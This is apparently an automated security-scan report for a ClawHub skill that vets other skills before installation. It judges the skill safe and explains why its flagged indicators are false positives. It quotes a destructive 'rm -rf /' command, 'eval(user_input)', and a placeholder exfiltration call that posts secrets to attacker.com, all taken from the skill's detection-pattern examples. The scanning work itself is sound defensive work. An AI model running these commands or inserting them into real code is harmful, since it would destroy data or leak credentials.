This report was generated in Chinese. Some content may be in Chinese.
Trusted — Risk Score 0/100
Last scan:4 hr ago Rescan
0 /100
eason-skill-vetting
Vet ClawHub skills for security and utility before installation. Use when considering installing a ClawHub skill, evaluating third-party code, or assessing whether a skill adds value over existing tools.
skill-vetting 是合法的 ClawHub 技能安全审计工具,预扫描标记的所有 IOC 均为文档示例中的误报,无实际恶意行为。
Skill Nameeason-skill-vetting
Duration40.8s
Enginepi
ClawHub Eason Skill Vetting v1.0.0 by eathon
📥 240 📦 2
ClawHub Verdict Suspicious dynamic_code_executionllm_suspiciousprompt_injection_instructions
Safe to install
可安全安装使用。预扫描中唯一的 CRITICAL IOC(rm -rf / @ references/patterns.md:20)出现在文档示例中,用于说明危险模式,非可执行代码。

Findings 3 items

Severity Finding Location
Info
预扫描 CRITICAL IOC 为文档示例误报 Doc Mismatch
references/patterns.md:20 中的 'rm -rf /' 出现在文档的恶意模式示例中,用于教育读者为何 eval()/exec() 是危险模式。这是文档内容,不是可执行代码。预扫描器将其标记为 CRITICAL 是误报。
# RED FLAG\neval(user_input)\nexec(compiled_code)
→ 无需操作。这是文档中的教育性示例,不是实际恶意代码。
references/patterns.md:20
Info
URL IOC 均为文档示例或合法 ClawHub API Doc Mismatch
所有预扫描标记的 URL:clawhub.ai/api/v1/download 是文档中声明的合法 API;attacker.com/exfil 和 random-ip:8080/payload.py 是 references/patterns.md 中作为 SUSPICIOUS ENDPOINTS 示例的占位符,属于模式数据库的教育内容。
requests.post('https://attacker.com/exfil', data=secrets)
→ 无需操作。所有 URL 均属于文档/示例内容,非实际网络请求。
references/patterns.md:63
Info
scripts/scan.py 无第三方依赖声明 Supply Chain
scan.py 仅使用 Python 3 标准库(os, re, sys, json, base64, pathlib, typing),无需 requirements.txt 或依赖声明文件。无外部依赖引入供应链风险。
import os, re, sys, json, base64, pathlib, typing
→ 无需操作。纯标准库,无第三方依赖风险。
scripts/scan.py:1
ResourceDeclaredInferredStatusEvidence
Filesystem READ READ ✓ Aligned SKILL.md: scripts/scan.py reads skill files via Read tool
Network READ READ ✓ Aligned SKILL.md: curl download from clawhub.ai/api/v1/download — documented API endpoin…
Shell WRITE WRITE ✓ Aligned SKILL.md: python3 scan.py — subprocess invocation for CLI tool; scripts/scan.py …
1 Critical 6 findings
💀
Critical Dangerous Command 危险 Shell 命令
rm -rf /
references/patterns.md:20
🔗
Medium External URL 外部 URL
https://clawhub.ai/api/v1/download?slug=SLUG
ARCHITECTURE.md:138
🔗
Medium External URL 外部 URL
https://clawhub.ai/api/v1/download?slug=SKILL_NAME
SKILL.md:15
🔗
Medium External URL 外部 URL
https://attacker.com/exfil
references/patterns.md:63
🔗
Medium External URL 外部 URL
http://random-ip:8080/payload.py
references/patterns.md:64
🔗
Medium External URL 外部 URL
https://attacker.com
references/patterns.md:159

File Tree

5 files · 30.2 KB · 904 lines
Markdown 3f · 667L Python 1f · 232L JSON 1f · 5L
├─ 📁 references
│ └─ 📝 patterns.md Markdown 219L · 4.6 KB
├─ 📁 scripts
│ └─ 🐍 scan.py Python 232L · 9.5 KB
├─ 📋 _meta.json JSON 5L · 138 B
├─ 📝 ARCHITECTURE.md Markdown 297L · 10.8 KB
└─ 📝 SKILL.md Markdown 151L · 5.1 KB

Security Positives

✓ 纯 Python 标准库实现,无第三方依赖引入供应链风险
✓ scan.py 使用纯正则匹配检测恶意模式,逻辑清晰可审计
✓ SKILL.md 包含全面的 prompt injection 警告和教育性文档
✓ SKILL.md 行为与代码实现完全一致,无阴影功能
✓ SKILL.md 明确声明了 download→scan→review 的三步工作流,权限边界清晰
✓ ARCHITECTURE.md 提供了对抗 prompt injection 的分层防御设计文档
✓ Scanner 包含专门的 prompt_injection 检测模式(CRITICAL 级别),有效防御社交工程攻击